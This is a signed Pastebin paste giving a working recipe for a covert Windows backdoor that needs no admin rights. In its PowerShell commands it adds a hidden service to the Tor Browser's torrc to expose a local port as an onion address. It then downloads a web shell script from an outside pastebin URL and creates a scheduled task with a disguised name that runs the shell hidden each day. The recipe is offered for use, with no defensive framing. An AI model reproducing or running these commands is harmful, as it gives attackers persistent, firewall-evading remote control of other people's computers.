Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -----BEGIN PGP SIGNED MESSAGE-----
- Hash: SHA512
- _______________________________________
- / Vegeta_Ssj : Windows Backdoor without \
- \ Admin, Bypass FW with Tor Browser /
- ---------------------------------------
- \ ^__^
- \ (oo)\_______
- (__)\ )\/\
- ||----w |
- || ||
- email: vegeta_ssj@riseup.net
- jid: vegeta@exploit.im / vegeta_ssj@4cjw6cwpeaeppfqz.onion
- https://i.postimg.cc/g2RpjWTZ/webshell.png
- Find torrc file:
- PS C:\Users\IEUser> Get-Childitem -recurse -filter torrc
- Directory: C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor
- Mode LastWriteTime Length Name
- - - - - - - - ---- ------------- ------ ----
- - - - - - - - -a---- 6/29/2020 12:44 PM 3060 torrc
- Left surprise:
- $torrcpath = "C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc"
- $conf = "HiddenServiceDir C:/Users/IEUser/Desktop/Tor Browser/Browser/TorBrowser/Data/Hidden`nHiddenServicePort 80 127.0.0.1:8080"
- $conf | Add-Content -Path $torrcpath
- $hostname = "C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Hidden\hostname"
- PS C:\Users\IEUser\> cat $hostname
- 4jq55x4lxjhvsbjhqdsjxsevswx34fdt2xjyuduo6tr2www2p3owk8qd.onion
- Download webshell:
- $url = "https://pastebin.com/raw/h59LJpni";$output ="$pwd\web-shell.ps1"
- Invoke-WebRequest -Uri $url -OutFile $output
- Create backdoor | sheduled task:
- PS C:\Users\IEUser\Desktop> schtasks.exe /CREATE /SC DAILY /TN "Legit as Fucked" /TR "powershell -windowstyle hidden C:\Users\IEUser\Desktop\web-shell.ps1" /ST 15:27
- SUCCESS: The scheduled task "Legit as Fucked" has successfully been created.
- #start-process PowerShell.exe -arg $pwd\web.ps1 -WindowStyle Hidden
- Enjoy :)
- -----BEGIN PGP SIGNATURE-----
- iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl8KQMZfFIAAAAAALgAo
- aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2
- NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK
- CJZlLQP+Mplloyhw/leAju7N/VnbSkqBy7DGjKD62tOz8i+4YOYBlg6FTF9gZb6s
- TGutGco0OUhEiiYk283t+Fq+duR1i2H+dqCuTuy1ct1C9NB60p3WaUvpFyg/vjOL
- FgSvAPlKwkznwSs+3Aoa/Y0HpkOjR3A0/GeveEDGnQ5XNbqxeC4=
- =5eai
- -----END PGP SIGNATURE-----
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement